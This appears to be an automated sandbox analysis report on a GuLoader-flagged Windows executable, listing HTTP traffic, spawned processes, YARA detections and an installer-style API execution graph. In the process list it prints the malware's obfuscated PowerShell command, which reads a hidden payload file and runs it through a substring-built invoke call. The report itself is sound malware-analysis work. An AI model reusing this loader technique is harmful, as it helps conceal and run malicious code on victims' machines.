                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:36:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 35 4b 75 66 74 4c 45 51 71 6b 57 36 5f 30 35 6a 77 73 7a 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w5KuftLEQqkW6_05jwszmg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:22:33:38
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\yMXFgPOdf2.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\yMXFgPOdf2.exe"
                                                                Imagebase:0x400000
                                                                File size:554'816 bytes
                                                                MD5 hash:54327A2F6C75BB2C549A5A98A462A588
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:22:33:38
                                                                Start date:10/01/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
                                                                Imagebase:0x6f0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2654376691.000000000ABA2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:22:33:38
                                                                Start date:10/01/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:22:34:35
                                                                Start date:10/01/2025
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0xf70000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3919921584.0000000005692000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:21.6%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:21.3%
                                                                  Total number of Nodes:1264
                                                                  Total number of Limit Nodes:31
                                                                  execution_graph 3493 401d41 GetDC GetDeviceCaps 3494 402b1b 18 API calls 3493->3494 3495 401d5f MulDiv ReleaseDC 3494->3495 3496 402b1b 18 API calls 3495->3496 3497 401d7e 3496->3497 3498 405dc3 18 API calls 3497->3498 3499 401db7 CreateFontIndirectW 3498->3499 3500 4024e6 3499->3500 3501 401a42 3502 402b1b 18 API calls 3501->3502 3503 401a48 3502->3503 3504 402b1b 18 API calls 3503->3504 3505 4019f0 3504->3505 3506 402744 3507 40273f 3506->3507 3507->3506 3508 402754 FindNextFileW 3507->3508 3509 4027a6 3508->3509 3510 40275f 3508->3510 3512 405da1 lstrcpynW 3509->3512 3512->3510 3513 401cc6 3514 402b1b 18 API calls 3513->3514 3515 401cd9 SetWindowLongW 3514->3515 3516 4029c5 3515->3516 3517 4049c7 GetDlgItem GetDlgItem 3518 404a19 7 API calls 3517->3518 3526 404c32 3517->3526 3519 404abc DeleteObject 3518->3519 3520 404aaf SendMessageW 3518->3520 3521 404ac5 3519->3521 3520->3519 3523 404afc 3521->3523 3525 405dc3 18 API calls 3521->3525 3522 404d16 3524 404dc2 3522->3524 3529 404c25 3522->3529 3534 404d6f SendMessageW 3522->3534 3527 403fe6 19 API calls 3523->3527 3530 404dd4 3524->3530 3531 404dcc SendMessageW 3524->3531 3532 404ade SendMessageW SendMessageW 3525->3532 3526->3522 3546 404ca3 3526->3546 3570 404915 SendMessageW 3526->3570 3528 404b10 3527->3528 3533 403fe6 19 API calls 3528->3533 3535 40404d 8 API calls 3529->3535 3541 404de6 ImageList_Destroy 3530->3541 3542 404ded 3530->3542 3547 404dfd 3530->3547 3531->3530 3532->3521 3550 404b1e 3533->3550 3534->3529 3539 404d84 SendMessageW 3534->3539 3540 404fb8 3535->3540 3536 404d08 SendMessageW 3536->3522 3538 404f6c 3538->3529 3548 404f7e ShowWindow GetDlgItem ShowWindow 3538->3548 3545 404d97 3539->3545 3541->3542 3543 404df6 GlobalFree 3542->3543 3542->3547 3543->3547 3544 404bf3 GetWindowLongW SetWindowLongW 3549 404c0c 3544->3549 3555 404da8 SendMessageW 3545->3555 3546->3522 3546->3536 3547->3538 3564 404e38 3547->3564 3575 404995 3547->3575 3548->3529 3551 404c12 ShowWindow 3549->3551 3552 404c2a 3549->3552 3550->3544 3554 404b6e SendMessageW 3550->3554 3556 404bed 3550->3556 3558 404baa SendMessageW 3550->3558 3559 404bbb SendMessageW 3550->3559 3568 40401b SendMessageW 3551->3568 3569 40401b SendMessageW 3552->3569 3554->3550 3555->3524 3556->3544 3556->3549 3558->3550 3559->3550 3561 404f42 InvalidateRect 3561->3538 3562 404f58 3561->3562 3584 40482f 3562->3584 3563 404e66 SendMessageW 3566 404e7c 3563->3566 3564->3563 3564->3566 3566->3561 3567 404ef0 SendMessageW SendMessageW 3566->3567 3567->3566 3568->3529 3569->3526 3571 404974 SendMessageW 3570->3571 3572 404938 GetMessagePos ScreenToClient SendMessageW 3570->3572 3573 40496c 3571->3573 3572->3573 3574 404971 3572->3574 3573->3546 3574->3571 3592 405da1 lstrcpynW 3575->3592 3577 4049a8 3593 405ce8 wsprintfW 3577->3593 3579 4049b2 3580 40140b 2 API calls 3579->3580 3581 4049bb 3580->3581 3594 405da1 lstrcpynW 3581->3594 3583 4049c2 3583->3564 3585 40484c 3584->3585 3586 405dc3 18 API calls 3585->3586 3587 404881 3586->3587 3588 405dc3 18 API calls 3587->3588 3589 40488c 3588->3589 3590 405dc3 18 API calls 3589->3590 3591 4048bd lstrlenW wsprintfW SetDlgItemTextW 3590->3591 3591->3538 3592->3577 3593->3579 3594->3583 3595 401dc7 3596 402b1b 18 API calls 3595->3596 3597 401dcd 3596->3597 3598 402b1b 18 API calls 3597->3598 3599 401dd6 3598->3599 3600 401de8 EnableWindow 3599->3600 3601 401ddd ShowWindow 3599->3601 3602 4029c5 3600->3602 3601->3602 3603 4047c9 3604 4047f5 3603->3604 3605 4047d9 3603->3605 3606 404828 3604->3606 3607 4047fb SHGetPathFromIDListW 3604->3607 3614 405561 GetDlgItemTextW 3605->3614 3609 404812 SendMessageW 3607->3609 3610 40480b 3607->3610 3609->3606 3612 40140b 2 API calls 3610->3612 3611 4047e6 SendMessageW 3611->3604 3612->3609 3614->3611 3615 401bca 3616 402b1b 18 API calls 3615->3616 3617 401bd1 3616->3617 3618 402b1b 18 API calls 3617->3618 3619 401bdb 3618->3619 3621 402b38 18 API calls 3619->3621 3625 401beb 3619->3625 3620 401bfb 3623 401c06 3620->3623 3624 401c4a 3620->3624 3621->3625 3622 402b38 18 API calls 3622->3620 3626 402b1b 18 API calls 3623->3626 3627 402b38 18 API calls 3624->3627 3625->3620 3625->3622 3628 401c0b 3626->3628 3629 401c4f 3627->3629 3630 402b1b 18 API calls 3628->3630 3631 402b38 18 API calls 3629->3631 3633 401c14 3630->3633 3632 401c58 FindWindowExW 3631->3632 3636 401c7a 3632->3636 3634 401c3a SendMessageW 3633->3634 3635 401c1c SendMessageTimeoutW 3633->3635 3634->3636 3635->3636 3637 4024ca 3638 402b38 18 API calls 3637->3638 3639 4024d1 3638->3639 3642 405a0d GetFileAttributesW CreateFileW 3639->3642 3641 4024dd 3642->3641 3643 40194b 3644 402b1b 18 API calls 3643->3644 3645 401952 3644->3645 3646 402b1b 18 API calls 3645->3646 3647 40195c 3646->3647 3648 402b38 18 API calls 3647->3648 3649 401965 3648->3649 3650 401979 lstrlenW 3649->3650 3651 4019b5 3649->3651 3652 401983 3650->3652 3652->3651 3656 405da1 lstrcpynW 3652->3656 3654 40199e 3654->3651 3655 4019ab lstrlenW 3654->3655 3655->3651 3656->3654 3660 4019cf 3661 402b38 18 API calls 3660->3661 3662 4019d6 3661->3662 3663 402b38 18 API calls 3662->3663 3664 4019df 3663->3664 3665 4019e6 lstrcmpiW 3664->3665 3666 4019f8 lstrcmpW 3664->3666 3667 4019ec 3665->3667 3666->3667 3343 401e51 3344 402b38 18 API calls 3343->3344 3345 401e57 3344->3345 3346 40504b 25 API calls 3345->3346 3347 401e61 3346->3347 3348 40551c 2 API calls 3347->3348 3349 401e67 3348->3349 3350 401ec6 CloseHandle 3349->3350 3351 401e77 WaitForSingleObject 3349->3351 3353 402791 3349->3353 3350->3353 3352 401e89 3351->3352 3354 401e9b GetExitCodeProcess 3352->3354 3355 406144 2 API calls 3352->3355 3356 401eba 3354->3356 3357 401ead 3354->3357 3358 401e90 WaitForSingleObject 3355->3358 3356->3350 3360 401eb8 3356->3360 3361 405ce8 wsprintfW 3357->3361 3358->3352 3360->3350 3361->3360 3668 402251 3669 40225f 3668->3669 3670 402259 3668->3670 3672 402b38 18 API calls 3669->3672 3674 40226d 3669->3674 3671 402b38 18 API calls 3670->3671 3671->3669 3672->3674 3673 40227b 3676 402b38 18 API calls 3673->3676 3674->3673 3675 402b38 18 API calls 3674->3675 3675->3673 3677 402284 WritePrivateProfileStringW 3676->3677 3362 401752 3363 402b38 18 API calls 3362->3363 3364 401759 3363->3364 3365 401781 3364->3365 3366 401779 3364->3366 3402 405da1 lstrcpynW 3365->3402 3401 405da1 lstrcpynW 3366->3401 3369 40177f 3373 406035 5 API calls 3369->3373 3370 40178c 3371 4057ec 3 API calls 3370->3371 3372 401792 lstrcatW 3371->3372 3372->3369 3375 40179e 3373->3375 3374 4060e4 2 API calls 3374->3375 3375->3374 3376 4059e8 2 API calls 3375->3376 3378 4017b0 CompareFileTime 3375->3378 3379 401870 3375->3379 3381 401847 3375->3381 3384 405da1 lstrcpynW 3375->3384 3388 405dc3 18 API calls 3375->3388 3396 40557d MessageBoxIndirectW 3375->3396 3400 405a0d GetFileAttributesW CreateFileW 3375->3400 3376->3375 3378->3375 3380 40504b 25 API calls 3379->3380 3382 40187a 3380->3382 3383 40504b 25 API calls 3381->3383 3390 40185c 3381->3390 3385 402fa0 33 API calls 3382->3385 3383->3390 3384->3375 3386 40188d 3385->3386 3387 4018a1 SetFileTime 3386->3387 3389 4018b3 CloseHandle 3386->3389 3387->3389 3388->3375 3389->3390 3391 4018c4 3389->3391 3392 4018c9 3391->3392 3393 4018dc 3391->3393 3394 405dc3 18 API calls 3392->3394 3395 405dc3 18 API calls 3393->3395 3397 4018d1 lstrcatW 3394->3397 3398 4018e4 3395->3398 3396->3375 3397->3398 3399 40557d MessageBoxIndirectW 3398->3399 3399->3390 3400->3375 3401->3369 3402->3370 3678 402452 3679 402c42 19 API calls 3678->3679 3680 40245c 3679->3680 3681 402b1b 18 API calls 3680->3681 3682 402465 3681->3682 3683 402489 RegEnumValueW 3682->3683 3684 40247d RegEnumKeyW 3682->3684 3685 402791 3682->3685 3683->3685 3686 4024a2 RegCloseKey 3683->3686 3684->3686 3686->3685 3403 4022d3 3404 402303 3403->3404 3405 4022d8 3403->3405 3407 402b38 18 API calls 3404->3407 3416 402c42 3405->3416 3408 40230a 3407->3408 3420 402b78 RegOpenKeyExW 3408->3420 3409 4022df 3410 4022e9 3409->3410 3415 402322 3409->3415 3411 402b38 18 API calls 3410->3411 3413 4022f0 RegDeleteValueW RegCloseKey 3411->3413 3413->3415 3417 402b38 18 API calls 3416->3417 3418 402c5b 3417->3418 3419 402c69 RegOpenKeyExW 3418->3419 3419->3409 3426 402ba3 3420->3426 3428 402320 3420->3428 3421 402bc9 RegEnumKeyW 3422 402bdb RegCloseKey 3421->3422 3421->3426 3424 40610b 3 API calls 3422->3424 3423 402c00 RegCloseKey 3423->3428 3427 402beb 3424->3427 3425 402b78 3 API calls 3425->3426 3426->3421 3426->3422 3426->3423 3426->3425 3427->3428 3429 402c1b RegDeleteKeyW 3427->3429 3428->3415 3429->3428 3688 401ed4 3689 402b38 18 API calls 3688->3689 3690 401edb 3689->3690 3691 4060e4 2 API calls 3690->3691 3692 401ee1 3691->3692 3694 401ef2 3692->3694 3695 405ce8 wsprintfW 3692->3695 3695->3694 3696 4014d7 3697 402b1b 18 API calls 3696->3697 3698 4014dd Sleep 3697->3698 3700 4029c5 3698->3700 3701 40155b 3702 40296b 3701->3702 3705 405ce8 wsprintfW 3702->3705 3704 402970 3705->3704 3706 40165e 3707 402b38 18 API calls 3706->3707 3708 401665 3707->3708 3709 402b38 18 API calls 3708->3709 3710 40166e 3709->3710 3711 402b38 18 API calls 3710->3711 3712 401677 MoveFileW 3711->3712 3713 401683 3712->3713 3714 40168a 3712->3714 3715 401423 25 API calls 3713->3715 3716 4060e4 2 API calls 3714->3716 3718 402195 3714->3718 3715->3718 3717 401699 3716->3717 3717->3718 3719 405c3b 40 API calls 3717->3719 3719->3713 3720 4023de 3721 402c42 19 API calls 3720->3721 3722 4023e8 3721->3722 3723 402b38 18 API calls 3722->3723 3724 4023f1 3723->3724 3725 4023fc RegQueryValueExW 3724->3725 3728 402791 3724->3728 3726 402422 RegCloseKey 3725->3726 3727 40241c 3725->3727 3726->3728 3727->3726 3731 405ce8 wsprintfW 3727->3731 3731->3726 3732 401ce5 GetDlgItem GetClientRect 3733 402b38 18 API calls 3732->3733 3734 401d17 LoadImageW SendMessageW 3733->3734 3735 4029c5 3734->3735 3736 401d35 DeleteObject 3734->3736 3736->3735 3737 40206a 3738 402b38 18 API calls 3737->3738 3739 402071 3738->3739 3740 402b38 18 API calls 3739->3740 3741 40207b 3740->3741 3742 402b38 18 API calls 3741->3742 3743 402084 3742->3743 3744 402b38 18 API calls 3743->3744 3745 40208e 3744->3745 3746 402b38 18 API calls 3745->3746 3747 402098 3746->3747 3748 4020ac CoCreateInstance 3747->3748 3749 402b38 18 API calls 3747->3749 3752 4020cb 3748->3752 3749->3748 3750 401423 25 API calls 3751 402195 3750->3751 3752->3750 3752->3751 3753 40156b 3754 401584 3753->3754 3755 40157b ShowWindow 3753->3755 3756 401592 ShowWindow 3754->3756 3757 4029c5 3754->3757 3755->3754 3756->3757 3758 4024ec 3759 4024f1 3758->3759 3760 40250a 3758->3760 3761 402b1b 18 API calls 3759->3761 3762 402510 3760->3762 3763 40253c 3760->3763 3768 4024f8 3761->3768 3764 402b38 18 API calls 3762->3764 3765 402b38 18 API calls 3763->3765 3766 402517 WideCharToMultiByte lstrlenA 3764->3766 3767 402543 lstrlenW 3765->3767 3766->3768 3767->3768 3769 402565 WriteFile 3768->3769 3770 402791 3768->3770 3769->3770 3771 40276e 3772 402b38 18 API calls 3771->3772 3773 402775 FindFirstFileW 3772->3773 3774 402788 3773->3774 3775 40279d 3773->3775 3776 4027a6 3775->3776 3779 405ce8 wsprintfW 3775->3779 3780 405da1 lstrcpynW 3776->3780 3779->3776 3780->3774 3781 4018ef 3782 401926 3781->3782 3783 402b38 18 API calls 3782->3783 3784 40192b 3783->3784 3785 405629 71 API calls 3784->3785 3786 401934 3785->3786 3787 402571 3788 402b1b 18 API calls 3787->3788 3792 402580 3788->3792 3789 40269e 3790 4025c6 ReadFile 3790->3789 3790->3792 3791 405a90 ReadFile 3791->3792 3792->3789 3792->3790 3792->3791 3793 4026a0 3792->3793 3794 402606 MultiByteToWideChar 3792->3794 3796 4026b1 3792->3796 3797 40262c SetFilePointer MultiByteToWideChar 3792->3797 3799 405ce8 wsprintfW 3793->3799 3794->3792 3796->3789 3798 4026d2 SetFilePointer 3796->3798 3797->3792 3798->3789 3799->3789 3800 4014f1 SetForegroundWindow 3801 4029c5 3800->3801 3802 4018f2 3803 402b38 18 API calls 3802->3803 3804 4018f9 3803->3804 3805 40557d MessageBoxIndirectW 3804->3805 3806 401902 3805->3806 3430 401df3 3431 402b38 18 API calls 3430->3431 3432 401df9 3431->3432 3433 402b38 18 API calls 3432->3433 3434 401e02 3433->3434 3435 402b38 18 API calls 3434->3435 3436 401e0b 3435->3436 3437 402b38 18 API calls 3436->3437 3438 401e14 3437->3438 3442 401423 3438->3442 3441 401e4c 3443 40504b 25 API calls 3442->3443 3444 401431 ShellExecuteW 3443->3444 3444->3441 3812 4026f7 3813 4026fe 3812->3813 3815 402970 3812->3815 3814 402b1b 18 API calls 3813->3814 3816 402709 3814->3816 3817 402710 SetFilePointer 3816->3817 3817->3815 3818 402720 3817->3818 3820 405ce8 wsprintfW 3818->3820 3820->3815 3821 4040fa lstrcpynW lstrlenW 3822 402c7d 3823 402c8f SetTimer 3822->3823 3824 402ca8 3822->3824 3823->3824 3825 402cfd 3824->3825 3826 402cc2 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3824->3826 3826->3825 3827 4014ff 3828 401507 3827->3828 3829 40151a 3827->3829 3830 402b1b 18 API calls 3828->3830 3830->3829 3831 401000 3832 401037 BeginPaint GetClientRect 3831->3832 3833 40100c DefWindowProcW 3831->3833 3835 4010f3 3832->3835 3836 401179 3833->3836 3837 401073 CreateBrushIndirect FillRect DeleteObject 3835->3837 3838 4010fc 3835->3838 3837->3835 3839 401102 CreateFontIndirectW 3838->3839 3840 401167 EndPaint 3838->3840 3839->3840 3841 401112 6 API calls 3839->3841 3840->3836 3841->3840 3842 401a00 3843 402b38 18 API calls 3842->3843 3844 401a09 ExpandEnvironmentStringsW 3843->3844 3845 401a1d 3844->3845 3847 401a30 3844->3847 3846 401a22 lstrcmpW 3845->3846 3845->3847 3846->3847 3848 401b01 3849 402b38 18 API calls 3848->3849 3850 401b08 3849->3850 3851 402b1b 18 API calls 3850->3851 3852 401b11 wsprintfW 3851->3852 3853 4029c5 3852->3853 3854 404481 3855 4044ad 3854->3855 3856 4044be 3854->3856 3915 405561 GetDlgItemTextW 3855->3915 3858 4044ca GetDlgItem 3856->3858 3863 404529 3856->3863 3861 4044de 3858->3861 3859 40460d 3913 4047ae 3859->3913 3917 405561 GetDlgItemTextW 3859->3917 3860 4044b8 3862 406035 5 API calls 3860->3862 3865 4044f2 SetWindowTextW 3861->3865 3866 405897 4 API calls 3861->3866 3862->3856 3863->3859 3867 405dc3 18 API calls 3863->3867 3863->3913 3869 403fe6 19 API calls 3865->3869 3871 4044e8 3866->3871 3872 40459d SHBrowseForFolderW 3867->3872 3868 40463d 3873 4058f4 18 API calls 3868->3873 3874 40450e 3869->3874 3870 40404d 8 API calls 3875 4047c2 3870->3875 3871->3865 3879 4057ec 3 API calls 3871->3879 3872->3859 3876 4045b5 CoTaskMemFree 3872->3876 3877 404643 3873->3877 3878 403fe6 19 API calls 3874->3878 3880 4057ec 3 API calls 3876->3880 3918 405da1 lstrcpynW 3877->3918 3881 40451c 3878->3881 3879->3865 3882 4045c2 3880->3882 3916 40401b SendMessageW 3881->3916 3885 4045f9 SetDlgItemTextW 3882->3885 3890 405dc3 18 API calls 3882->3890 3885->3859 3886 404522 3888 40610b 3 API calls 3886->3888 3887 40465a 3889 40610b 3 API calls 3887->3889 3888->3863 3896 404662 3889->3896 3891 4045e1 lstrcmpiW 3890->3891 3891->3885 3894 4045f2 lstrcatW 3891->3894 3892 4046a1 3919 405da1 lstrcpynW 3892->3919 3894->3885 3895 4046a8 3897 405897 4 API calls 3895->3897 3896->3892 3898 4046f3 3896->3898 3901 405838 2 API calls 3896->3901 3899 4046ae GetDiskFreeSpaceW 3897->3899 3903 40475d 3898->3903 3905 40482f 21 API calls 3898->3905 3899->3898 3902 4046d1 MulDiv 3899->3902 3901->3896 3902->3898 3904 404780 3903->3904 3906 40140b 2 API calls 3903->3906 3920 404008 KiUserCallbackDispatcher 3904->3920 3907 40474f 3905->3907 3906->3904 3909 404754 3907->3909 3910 40475f SetDlgItemTextW 3907->3910 3912 40482f 21 API calls 3909->3912 3910->3903 3911 40479c 3911->3913 3921 404416 3911->3921 3912->3903 3913->3870 3915->3860 3916->3886 3917->3868 3918->3887 3919->3895 3920->3911 3922 404424 3921->3922 3923 404429 SendMessageW 3921->3923 3922->3923 3923->3913 3924 404183 3926 4042b5 3924->3926 3927 40419b 3924->3927 3925 40431f 3928 4043f1 3925->3928 3929 404329 GetDlgItem 3925->3929 3926->3925 3926->3928 3933 4042f0 GetDlgItem SendMessageW 3926->3933 3930 403fe6 19 API calls 3927->3930 3935 40404d 8 API calls 3928->3935 3931 4043b2 3929->3931 3932 404343 3929->3932 3934 404202 3930->3934 3931->3928 3940 4043c4 3931->3940 3932->3931 3939 404369 6 API calls 3932->3939 3955 404008 KiUserCallbackDispatcher 3933->3955 3937 403fe6 19 API calls 3934->3937 3938 4043ec 3935->3938 3942 40420f CheckDlgButton 3937->3942 3939->3931 3943 4043da 3940->3943 3944 4043ca SendMessageW 3940->3944 3941 40431a 3946 404416 SendMessageW 3941->3946 3953 404008 KiUserCallbackDispatcher 3942->3953 3943->3938 3945 4043e0 SendMessageW 3943->3945 3944->3943 3945->3938 3946->3925 3948 40422d GetDlgItem 3954 40401b SendMessageW 3948->3954 3950 404243 SendMessageW 3951 404260 GetSysColor 3950->3951 3952 404269 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3950->3952 3951->3952 3952->3938 3953->3948 3954->3950 3955->3941 2901 401f08 2902 402b38 18 API calls 2901->2902 2903 401f0f GetFileVersionInfoSizeW 2902->2903 2904 4029c5 2903->2904 2905 401f36 GlobalAlloc 2903->2905 2905->2904 2906 401f4a GetFileVersionInfoW 2905->2906 2907 401f59 VerQueryValueW 2906->2907 2908 401f8c 2906->2908 2907->2908 2909 401f72 2907->2909 2908->2904 2913 405ce8 wsprintfW 2909->2913 2911 401f7e 2914 405ce8 wsprintfW 2911->2914 2913->2911 2914->2908 3181 40518a 3182 405336 3181->3182 3183 4051ab GetDlgItem GetDlgItem GetDlgItem 3181->3183 3185 405367 3182->3185 3186 40533f GetDlgItem CreateThread CloseHandle 3182->3186 3226 40401b SendMessageW 3183->3226 3188 405392 3185->3188 3189 4053b7 3185->3189 3190 40537e ShowWindow ShowWindow 3185->3190 3186->3185 3249 40511e 5 API calls 3186->3249 3187 40521c 3195 405223 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3187->3195 3192 4053a6 3188->3192 3193 4053cc ShowWindow 3188->3193 3196 4053f2 3188->3196 3235 40404d 3189->3235 3231 40401b SendMessageW 3190->3231 3232 403fbf 3192->3232 3200 4053ec 3193->3200 3201 4053de 3193->3201 3202 405292 3195->3202 3203 405276 SendMessageW SendMessageW 3195->3203 3196->3189 3197 405400 SendMessageW 3196->3197 3199 4053c5 3197->3199 3204 405419 CreatePopupMenu 3197->3204 3208 403fbf SendMessageW 3200->3208 3207 40504b 25 API calls 3201->3207 3205 4052a5 3202->3205 3206 405297 SendMessageW 3202->3206 3203->3202 3209 405dc3 18 API calls 3204->3209 3227 403fe6 3205->3227 3206->3205 3207->3200 3208->3196 3211 405429 AppendMenuW 3209->3211 3213 405446 GetWindowRect 3211->3213 3214 405459 TrackPopupMenu 3211->3214 3212 4052b5 3215 4052f2 GetDlgItem SendMessageW 3212->3215 3216 4052be ShowWindow 3212->3216 3213->3214 3214->3199 3217 405474 3214->3217 3215->3199 3219 405319 SendMessageW SendMessageW 3215->3219 3218 4052d4 ShowWindow 3216->3218 3221 4052e1 3216->3221 3220 405490 SendMessageW 3217->3220 3218->3221 3219->3199 3220->3220 3222 4054ad OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3220->3222 3230 40401b SendMessageW 3221->3230 3224 4054d2 SendMessageW 3222->3224 3224->3224 3225 4054fb GlobalUnlock SetClipboardData CloseClipboard 3224->3225 3225->3199 3226->3187 3228 405dc3 18 API calls 3227->3228 3229 403ff1 SetDlgItemTextW 3228->3229 3229->3212 3230->3215 3231->3188 3233 403fc6 3232->3233 3234 403fcc SendMessageW 3232->3234 3233->3234 3234->3189 3236 404065 GetWindowLongW 3235->3236 3237 4040ee 3235->3237 3236->3237 3238 404076 3236->3238 3237->3199 3239 404085 GetSysColor 3238->3239 3240 404088 3238->3240 3239->3240 3241 404098 SetBkMode 3240->3241 3242 40408e SetTextColor 3240->3242 3243 4040b0 GetSysColor 3241->3243 3244 4040b6 3241->3244 3242->3241 3243->3244 3245 4040c7 3244->3245 3246 4040bd SetBkColor 3244->3246 3245->3237 3247 4040e1 CreateBrushIndirect 3245->3247 3248 4040da DeleteObject 3245->3248 3246->3245 3247->3237 3248->3247 3250 403b0e 3251 403c61 3250->3251 3252 403b26 3250->3252 3254 403c72 GetDlgItem GetDlgItem 3251->3254 3255 403cb2 3251->3255 3252->3251 3253 403b32 3252->3253 3256 403b50 3253->3256 3257 403b3d SetWindowPos 3253->3257 3258 403fe6 19 API calls 3254->3258 3259 403d0c 3255->3259 3264 401389 2 API calls 3255->3264 3261 403b55 ShowWindow 3256->3261 3262 403b6d 3256->3262 3257->3256 3263 403c9c SetClassLongW 3258->3263 3260 404032 SendMessageW 3259->3260 3282 403c5c 3259->3282 3280 403d1e 3260->3280 3261->3262 3265 403b75 DestroyWindow 3262->3265 3266 403b8f 3262->3266 3267 40140b 2 API calls 3263->3267 3268 403ce4 3264->3268 3319 403f6f 3265->3319 3269 403b94 SetWindowLongW 3266->3269 3270 403ba5 3266->3270 3267->3255 3268->3259 3271 403ce8 SendMessageW 3268->3271 3269->3282 3274 403bb1 GetDlgItem 3270->3274 3275 403c4e 3270->3275 3271->3282 3272 40140b 2 API calls 3272->3280 3273 403f71 DestroyWindow EndDialog 3273->3319 3276 403be1 3274->3276 3277 403bc4 SendMessageW IsWindowEnabled 3274->3277 3278 40404d 8 API calls 3275->3278 3281 403be6 3276->3281 3284 403bee 3276->3284 3285 403c35 SendMessageW 3276->3285 3286 403c01 3276->3286 3277->3276 3277->3282 3278->3282 3279 403fa0 ShowWindow 3279->3282 3280->3272 3280->3273 3280->3282 3283 405dc3 18 API calls 3280->3283 3292 403fe6 19 API calls 3280->3292 3295 403fe6 19 API calls 3280->3295 3310 403eb1 DestroyWindow 3280->3310 3287 403fbf SendMessageW 3281->3287 3283->3280 3284->3281 3284->3285 3285->3275 3288 403c09 3286->3288 3289 403c1e 3286->3289 3290 403c1c 3287->3290 3293 40140b 2 API calls 3288->3293 3291 40140b 2 API calls 3289->3291 3290->3275 3294 403c25 3291->3294 3292->3280 3293->3281 3294->3275 3294->3281 3296 403d99 